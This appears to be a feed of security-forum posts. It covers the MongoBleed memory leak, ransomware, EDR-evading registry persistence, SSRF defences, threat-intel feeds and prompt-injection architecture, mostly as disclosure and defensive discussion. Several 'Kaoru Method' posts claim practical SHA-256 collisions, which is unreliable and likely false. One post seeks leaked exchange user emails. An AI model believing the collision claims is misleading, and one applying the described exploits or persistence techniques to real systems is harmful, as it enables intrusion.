Hi everyone, I wrote a practical guide to finding soundness bugs in ZK circuits. It starts out with basic Circom examples, then discusses real-world exploits. Check it out if you are interested in auditing real-world ZK deployments.
The tool is more important than the blog post; it does everything automatically for you: https://github.com/Adversis/tailsnitch
A security auditor for Tailscale configurations. Scans your tailnet for misconfigurations, overly permissive access controls, and security best practice violations.
And if you just want the checklist: https://github.com/Adversis/tailsnitch/blob/main/HARDENING_TAILSCALE.md
The HardBit ransomware family’s fourth iteration exhibits elevated operational security with mandatory operator-supplied runtime authorization, blurring forensic attribution. Its dual interface models, leveraging legacy infection deployment alongside contemporary hands-on-keys techniques, and an optional destructive wiper mode, represent hybrid malware design converging extortion and sabotage.
Lateral movement enabled through stolen credentials and disablement of recovery vectors reflects targeting of high-value networks for durable control. The absence of data leak websites limits external visibility into victimology, complicating response efforts. This evolution spotlights the intensifying sophistication and malice of ransomware operations.
Hi everyone,
I’m a 24-year-old cybersecurity and information security consultant working for a company in the Netherlands. I hold an HBO-level education and my main area of expertise is social engineering, with a strong focus on mystery guest and physical security assessments for clients.
Currently, I’m the only employee performing these types of projects. Our team was reduced from six people to just me, mainly to move away from multiple individual working styles and to allow the others to focus on long-term projects such as (C)ISO-related work.
Regarding physical security, my goal is to move toward an approach where I not only perform the physical tests (such as mystery guest or intrusion-style assessments), but also expand into providing advisory input on the theoretical and organizational side based on the findings. At the moment, my role is limited to executing the assessments and delivering the final report.
I’d like to further develop my skills and deepen my expertise by obtaining a certification this year (or however long it realistically takes). However, I’m finding it difficult to identify certifications that truly fit this niche. I’ve broadened my search beyond mystery guest and physical security to certifications focused on social engineering, ideally including the psychological or human-factor aspects, while still remaining rooted in security testing. OSINT certs like added aren’t relevant enough, since there isn’t enough interest from clients.
Most psychology-oriented certifications are unfortunately not an option for me, as they require an HBO diploma with a psychology background. My background is in cybersecurity, and I’d prefer something that builds on that.
Practical constraints: • Budget: ~€5,000 (with some flexibility if there’s a strong case) • Time: I work full-time (40 hours), run my own business on the side, and have a private life, so anything requiring extreme workloads (e.g. 100+ hours/week) is not realistic • Format: Online is preferred unless the training is located in the Netherlands or nearby regions in Belgium or Germany • Language: English or Dutch
I don’t currently hold any certifications in this specific area.
Does anyone have experience with certifications related to social engineering, human factors, or physical security testing that would fit this profile? Any recommendations or insights would be greatly appreciated.
Spent few days analysing MongoDB, please summarize the analysis and findings.
MongoBleed, tracked as CVE-2025-14847, an unauthenticated memory disclosure vulnerability affecting MongoDB across multiple major versions. It allows remote clients to extract uninitialized heap memory from the MongoDB process using nothing more than valid compressed wire-protocol messages.
This is not native RCE. This is not an issue on the library zlib, is more on the compression-decompression and It is a memory leak. It does not leave a lot of traces, It is silent, repeatable, and reachable before authentication.
- Full Detailed Blog: https://phoenix.security/mongobleed-vulnerability-cve-2025-14847/
- Exploit explanation and lab: https://youtu.be/EZ4euRyDI8I
- Exploit Description (llm generated from article): https://youtu.be/lxfNSICAaSc
- Github Exploit for Mongobleed: https://github.com/Security-Phoenix-demo/mongobleed-exploit-CVE-2025-14847/tree/main
- Github Scanner for web: https://github.com/Security-Phoenix-demo/mongobleed-exploit-CVE-2025-14847/tree/main/scanner
- Github Scanner for Code: https://github.com/Security-Phoenix-demo/mongobleed-exploit-CVE-2025-14847/tree/main/code-sca
(Note I spend more time writing exploits, have dyslexia, and I'm not a native English, an LLM proofreads some sections, if this offends you, stop reading)
| MongoDB Server | Vulnerable versions | Fixed versions |
|---|---|---|
| 8.2.x | 8.2.0 – 8.2.2 | 8.2.3 |
| 8.0.x | 8.0.0 – 8.0.16 | 8.0.17 |
| 7.0.x | 7.0.0 – 7.0.27 | 7.0.28 |
| 6.0.x | 6.0.0 – 6.0.26 | 6.0.27 |
| 5.0.x | 5.0.0 – 5.0.31 | 5.0.32 |
| 4.4.x | 4.4.0 – 4.4.29 | 4.4.30 |
| 4.2.x | All | EOL |
| 4.0.x | All | EOL |
| 3.6.x | All | EOL |
SAAS version of MongoDB is already patched
MongoDB supports network-level message compression.
When a client negotiates compression, each compressed message includes an uncompressedSize field.
The vulnerable flow looks like this:
Memory gets leaked out, not a lot of IOC to detect
The vulnerability originates in MongoDB’s zlib message decompression logic:
src/mongo/transport/message_compressor_zlib.cpp
In the vulnerable implementation, the decompression routine returned:
return {output.length()}; output.length() represents the allocated buffer size, not the number of bytes actually written by ::uncompress().
If the attacker declares a larger uncompressedSize than the real decompressed payload, MongoDB propagates the allocated size forward. Downstream BSON parsing logic consumes memory beyond the true decompression boundary.
The fix replaces this with:
return length; length is the actual number of bytes written by the decompressor.
Additional regression tests were added in message_compressor_manager_test.cpp to explicitly reject undersized decompression results with ErrorCodes::BadValue.
This closes the disclosure path.
Compression negotiation occurs before authentication.
The exploit does not require:
It relies on:
Any network client can trigger it, hence is super easy to deploy
A working proof of concept exists and is public, more details:
The PoC:
No credentials required.
No malformed packets.
Repeatable probing.
Heap memory is messy. That is the point.
Observed and expected leak content includes:
The PoC output already shows real runtime artifacts.
MongoBleed does not provide native remote code execution.
There is no instruction pointer control. No shellcode injection. No crash exploitation.
What it provides is privilege discovery.
Memory disclosure enables:
A leaked Kubernetes token is better than RCE.
A leaked CI token is persistent RCE.
A leaked cloud role is full environment control.
This is RCE-adjacent through legitimate interfaces.
MongoDB is everywhere.
Shodan telemetry captured on 29 December 2025 shows:
213,490 publicly reachable MongoDB instances
Version breakdown (port 27017):
| Version | Count | Query |
|---|---|---|
| All versions | 201,659 | product:"MongoDB" port:27017 |
| 8.2.x | 3,164 | "8.2." |
| 8.0.x (≠8.0.17) | 13,411 | "8.0." -"8.0.17" |
| 7.0.x (≠7.0.28) | 19,223 | "7.0." -"7.0.28" |
| 6.0.x (≠6.0.27) | 3,672 | "6.0." -"6.0.27" |
| 5.0.x (≠5.0.32) | 1,887 | "5.0." -"5.0.32" |
| 4.4.x (≠4.4.30) | 3,231 | "4.4." -"4.4.30" |
| 4.2.x | 3,138 | "4.2." |
| 4.0.x | 3,145 | "4.0." |
| 3.6.x | 1,145 | "3.6." |
Most are directly exposed on the default port, not shielded behind application tiers.
This favors patient actors and automation.
Look for:
Watch for:
Check for:
If you see filesystem artifacts or shells, you are already past exploitation.
If you cannot upgrade immediately:
These are stopgaps. The bug lives in the server - hence patch
A full test suite is available, combining:
Repository:
https://github.com/Security-Phoenix-demo/mongobleed-exploit-CVE-2025-14847
This allows:
MongoBleed does not break crypto it breaks data and memory
The database trusts client-supplied lengths.
Attackers live for that assumption.
Databases are part of your application attack surface.
Infrastructure bugs leak application secrets.
Vulnerability management without reachability is incomplete.
Patch this.
Then ask why it was reachable.
A blog post on a technique I've been sitting on for almost 18 months that is wildly succesful against all EDRs. Why? They don't see anything other than the file write to %USERPROFILE% (NTUSER.MAN) and not the writes to HKCU.
Ultimately making it incredibly effective for medium integrity persistence through the registry/without tripping detections.
Questions regarding netsec and discussion related directly to netsec are welcome here, as is sharing tool links.
As always, the content & discussion guidelines should also be observed on r/netsec.
Feedback and suggestions are welcome, but don't post it here. Please send it to the moderator inbox.
nullspace - ssrf protection for node.js
blocks private ips, cloud metadata, loopback
handles encoding tricks (0x7f000001 = 127.0.0.1)
dns rebinding protection built-in
zero deps
github : [ https://github.com/bymehul/nullspace ]
Working with a CTO on visibility into what's actually running locally across a 70-engineer org. (For the context, there's no ZTNA implementation, At the moment, if there's a way to approach it from ZTNA angle, I'd love to know)
Engineers use cursor heavily, started adopting MCPs, and now there's a mix of verified, open source, and basically untrusted github repos running locally.
Customer creds are accessible from these environments. We want visibility first - detect what MCPs exist, where they're installed, track usage.
That part feels tractable. But from a detection/monitoring angle, once you know what's there - what's worth actually watching?
Some MCPs legitimately need local execution so you can't just block them. Full network proxying feels unrealistic for dev workflows.
How you approached it? what can implement after visibility?
Static analysis is necessary, but it feels incomplete when it comes to how systems behave under real conditions. How are others dealing with that gap
When attackers use real credentials, everything they do can appear legitimate. Runtime monitoring often becomes the only way to spot it. How do you approach this in practice?
I’m approaching prompt injection less as an input sanitization issue and more as an authority and trust-boundary problem.
In many systems, model output is implicitly authorized to cause side effects, for example by triggering tool calls or function execution. Once generation is treated as execution-capable, sanitization and guardrails become reactive defenses around an actor that already holds authority.
I’m exploring an architecture where the model never has execution rights at all. It produces proposals only. A separate, non-generative control plane is the sole component allowed to execute actions, based on fixed policy and system state. If the gate says no, nothing runs. From this perspective, prompt injection fails because generation no longer implies authority. There’s no privileged path from text to side effects.
I’m curious whether people here see this as a meaningful shift in the trust model, or just a restatement of existing capability-based or mediation patterns in security systems.
Runtime threats rarely trigger obvious alerts. Usually something just feels slightly off before anything breaks. What subtle signs have tipped you off in the past?
A lot of environments look secure on paper, but runtime attacks often operate quietly. Credential misuse, app-layer abuse, and supply chain compromises tend to blend in rather than break things. What runtime signals have actually helped you catch issues early?
I am presenting a verified second-preimage collision for the SHA-256 algorithm, specifically targeting the Bitcoin Genesis Block header (Hash: 000000000019d668...).
Unlike previous theoretical differential attacks, this method utilizes a structural exploit in the message schedule (W-schedule) to manipulate internal states during the compression function. This allows for the generation of an alternative preimage (Kaoru DNA) that results in an identical 256-bit output.
Key Technical Aspects:
This discovery suggests that the collision resistance of SHA-256 is fundamentally compromised under specific state-transition conditions.
Verification Code: https://osf.io/2gdzq/files/dqghk
Every morning I find myself scrolling through 50+ tabs of RSS feeds, BleepingComputer, and CISA alerts. It’s exhausting.
I started a project called Threat Road to curate the "Top 3" most critical stories daily with a focus on immediate mitigations. I want to make it as useful as possible for the community.
I’d love your brutal honesty:
What makes a security newsletter "instant delete" for you?
Do you care about "Chili-pepper" risk ratings, or do you find them gimmicky?
Would you rather have a deep dive on one bug or a brief on three?
I'm just looking to hear what you all actually want in a daily briefing.
Little write-up for a patched WebSocket-based RCE I found in the CurseForge launcher.
It involved an unauthenticated local websocket API reachable from the browser, which could be abused to execute arbitrary code.
Happy to answer any questions if anyone has any!
Hey r/netsec -- it's been about two years since we last published a tool for the security community. As a little festive gift, today we're happy to announce the release of certgrep, a free Certificate Transparency search tool we built for our own detection work and decided to open up.
It’s focused on pattern-based discovery (regex/substring-style searches) and quick search and drill down workflows, as a complement to tools like crt.sh.
A few fun example queries it’s useful for:
(login|signin|account|secure).*yourbrand.*\*.*google.*yourbrand.*(cdn|assets|static).*We hope you like it, and would love to hear any feedback you folks may have! A number of iterations will be coming up, including API, SDKs, and integrations (e.g., Slack).
Enjoy!
A new research paper highlights a critical implementation flaw in how major vendors (ASUS, MSI, etc.) configure IOMMU during the DXE phase of boot.
The Core Issue:
The firmware reports DMA protection as "Active" to the OS, but fails to actually enable the IOMMU translation tables during the initial boot sequence. This creates a window of vulnerability where a malicious peripheral can read/write system memory unrestricted.
I've analyzed the root cause and the discrepancy between "Reported Status" vs "Actual Enforcement" in this report:
[👉 Full Analysis & Mitigation Strategies]https://www.nexaspecs.com/2025/12/critical-uefi-flaw-exposes-motherboards.html
Has anyone started seeing patched BIOS versions roll out yet?
Hi everyone,
Over the last month I’ve been analyzing modular addition not as a bitwise operation, but as a fractional mapping. Treating (a + b) mod 2^32 as a projection into the fractional domain [0, 1), modular “bit loss” stops behaving like noise and instead becomes predictable geometric wrapping.
This leads to what I call the Kaoru Method.
The core idea is to run a “Shadow SHA-256” in parallel using infinite precision arithmetic. By comparing the real SHA-256 state with the shadow state, it’s possible to reconstruct a Universal Carry Map (k) that fully captures all modular wraps occurring during execution.
Once k is recovered for the 64 rounds, the modular barriers effectively disappear and the compression function reduces to a system of linear equations.
In my experiments, a standard SHA-256 block produces exactly 186 modular wraps. This number appears stable and acts like a structural “DNA” of the hash computation.
Under this framework, differential cryptanalysis becomes significantly simpler, since the carry behavior is no longer hidden. I’m releasing both the theoretical framework and an extractor implementation so others can validate, attack, or extend the idea toward full collisions.
Paper (theory):
https://osf.io/jd392/files/4qyxc
Code (Shadow SHA-256 extractor):
https://osf.io/n9xcw
DOI:
https://doi.org/10.17605/OSF.IO/JD392
I’m aware this challenges some long-held assumptions about modular addition as a source of non-linearity, so I’m especially interested in feedback, counterexamples, or independent replication.
Thanks for reading.
Over one year ago the Goverment wanted to email the victims but Bitfinex denied it. But it is not too late yet if we act now. Did you hear of any availability of old crypto exchange user email addresses? Security researchers in possession of historic leak data could help to return $ nine digits to victims soon.
Please suggest specific forums for outreach.
Thanks!
Ranked list of 2016 exchanges: Poloniex Bitstamp OKCoin BTC-e LocalBitcoins Huobi Xapo Kraken CoinJoinMess Bittrex BitPay NitrogenSports-eu Cex-io BitVC Bitcoin-de YoBit-net Cryptsy HaoBTC BTCC BX-in-th Hashnest BtcMarkets-net Gatecoin Purse-io CloudBet Cubits AnxPro Bitcurex AlphaBayMarket Luno BTCC Loanbase Bitbond BTCJam Bit-x BitPay BitBay-net NucleusMarket PrimeDice BitAces-me Bter MasterXchange CoinGaming-io CoinJar Cryptopay-me FaucetBOX Genesis-Mining
Mac Malware analysis
A few days ago u/broadexample pointed out that our free STIX feed was doing it wrong:
"You're creating everything as Indicator, not as IPv4Address linked to Indicator via STIX Relationship hierarchy. This works when you use just this feed alone, but for everyone using multiple feeds it would be much less useful."
They were right. We were creating flat Indicator objects instead of proper STIX 2.1 hierarchy with SCOs and Relationships.
Fixed it today. New V2 endpoint with:
- IPv4Address SCOs with deterministic UUIDs (uuid5 for cross-feed deduplication)
- Relationship objects linking Indicator → SCO ("based-on")
- Malware SDOs for 10 families (Stealc, LummaC2, Cobalt Strike, etc.)
- Relationship objects linking Indicator → Malware ("indicates")
Should actually work properly in OpenCTI now.
V2 endpoint: https://analytics.dugganusa.com/api/v1/stix-feed/v2
V1 still works if you just need IOC lists: https://analytics.dugganusa.com/api/v1/stix-feed
Full writeup: https://www.dugganusa.com/post/stix-v2-reddit-feedback-opencti-ready
Thanks for the feedback. This is why we post here - you catch the stuff we miss.
During routine threat hunting on my Beelzebub honeypot, I caught something interesting: a Rust-based DDoS bot with 0 detections across 60+ AV engines at the time of capture.
TL;DR:
In the post you'll find:
The fact that no AV detected it shows that Rust + string obfuscation is making life hard for traditional detection engines.
Questions? AMA!
I’ve opened the early access waitlist for CyberCTF.space, a cybersecurity CTF platform focused on real-world attacks, not puzzle only challenges. - Docker based labs - MITRE ATT&CK aligned techniques - Real World exploits
🎖 Early joiners receive Founding Hacker recognition.
I’m also looking for security practitioners interested in contributing labs, challenges, or documentation.
Join the waitlist: https://cyberctf.space/
Contributors: https://cyberctf.space/contributors
Full disclosure: I'm a researcher at CyberArk Labs.
This is a technical deep dive from our threat research team, no marketing fluff, just code and methodology.
Static analysis tools like CodeQL are great at identifying "maybe" issues, but the signal-to-noise ratio is often overwhelming. You get thousands of alerts, and manually triaging them is impossible.
We built an open-source tool, Vulnhalla, to address this issue. It queries CodeQL's "haystack" into GPT-4o, which reasons about the code context to verify if the alert is legitimate.
The sheer volume of false positives often tricks us into thinking a codebase is "clean enough" just because we can't physically get through the backlog. This creates a significant amount of frustration for us. Still, the vulnerabilities remain, hidden in the noise.
Once we used GPT-4o to strip away ~96% of the false positives, we uncovered confirmed CVEs in the Linux Kernel, FFmpeg, Redis, Bullet3, and RetroArch. We found these in just 2 days of running the tool and triaging the output (total API cost <$80).
Running the tool for longer periods, with improved models, can reveal many additional vulnerabilities.
Write-up & Tool:
We don’t lack security ideas. We lack companies hiring juniors and products that are secure by default. These two problems are connected, and until we fix both, we’ll keep talking about a skills shortage while making it impossible to build a secure society.
What do you all think?
New preprint exploring unconventional cryptanalysis:
• Framework: “Inverse Dimensionalization”
• Target: SHA-256 structural analysis
• Result: 174/256 matching bits (M₁ = 88514, M₂ = 88551)
• Time: 3.8 seconds
• NOT a collision — but statistically anomalous
Paper + reproducible code: https://doi.org/10.17605/OSF.IO/6YRW8
Full paper with math and code: https://doi.org/10.17605/OSF.IO/6YRW8
Paper: https://osf.io/6yrw8/files/wj9ze
Code: https://osf.io/6yrw8/files/zy8ck
Verification code: https://osf.io/6yrw8/files/pqne7
Device specifications used to find the 174/256-bit match in 3.8 seconds:
• Google Colab Free CPU
• Intel Xeon
• Clock speed: between 2.20 GHz and 2.30 GHz
• Cores (vCPUs): 2 virtual cores
• RAM: 12 GB
Security implications discussion welcome.
I’m traveling next week and will need to access a website that is IP address -sensitive. My work computer’s IP address is approved for the site. If I access my work desktop remotely using something like LogMeIn or Team Viewer, will I be able to get onto the website I need to use? Or will my public IP address show up as the one I’m using from far?
Built a threat intel platform that runs on $75/month infrastructure. Decided to give the STIX feed away for free instead of charging enterprise prices for it.
What's in it:
- 59K IOCs (IPs, domains, hashes, URLs)
- ThreatFox, OTX, honeypot captures, and original discoveries
- STIX 2.1 compliant (works with Sentinel, TAXII consumers, etc.)
- Updated continuously
Feed URL: https://analytics.dugganusa.com/api/v1/stix-feed
Search API (if you want to query it): https://analytics.dugganusa.com/api/v1/search?q=cobalt+strike
We've been running this for a few months. Microsoft Sentinel and AT&T are already polling it. Found 244 things before CrowdStrike/Palo Alto had signatures for them (timestamped, documented).
Not trying to sell anything - genuinely curious if it's useful and what we're missing. Built it to scratch our own itch.
Tear it apart.
tl;dr: Ask Claude Code to tee mitmdump to a log file (with request and response). Create skills based on hackerone public reports (download from hf), let Claude Code figure out if it can find anything in the log file.
An active phishing campaign has been detection by Evalian SOC targeting HubSpot customers.
Just finished reading ActiveFence’s emerging threats assessment on 7 major models across hate speech, disinfo, fraud, and CSAM-adjacent prompts.
Key findings are: 44% of outputs were rated risky, 68% of unsafe ones were hate-speech-related, and only a single model landed in the safe range.
What really jumps out is how different vendors behave per abuse area (fraud looks relatively well-covered, hate and child safety really don’t).
For those doing your own evals/red teaming: are you seeing similar per-category gaps? Has anyone brought in an external research partner like ActiveFence to track emerging threats over time?